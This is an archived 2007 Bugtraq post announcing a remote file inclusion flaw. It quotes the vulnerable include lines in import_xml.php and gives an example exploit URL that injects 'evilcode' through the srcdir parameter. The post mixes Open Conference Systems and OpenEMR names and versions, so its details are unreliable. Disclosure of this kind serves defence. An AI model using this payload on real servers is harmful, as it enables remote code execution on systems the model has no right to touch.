| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 27 Jan 2007 12:52:38 -0000
From: trzindan@...mail.com
To: bugtraq@...urityfocus.com
Subject: Open Conference Systems = 2.8.2 Remote File Inclusion
#########################################################################
# Open Conference Systems <= 2.8.2 Remote File Inclusion
# Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz
#
# Found By : Tr_ZiNDaN
# Location : TurkeY -- #trzindan@...mail.fr
########################################################################
file ;
import_xml.php
########################################################################
bugs ;
at -- import_xml.php
include_once("$srcdir/patient.inc");
include_once("$srcdir/acl.inc");
########################################################################
exmple and methode exploit ;
http://localhost/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode?
########################################################################
Thanks;
str0ke,EL_MuHaMMeD,CyberWolf,EntRika,Blackwolf,Crackers_Child,KurtEfendy,
Canberx,Chaos,C0ld_Z3r0,Arslan,H0tturk,aLman,k1tk4t ;) MusLim Hackers
########################################################################
T3k T4b4nC4 2oo7~
Powered by blists - more mailing lists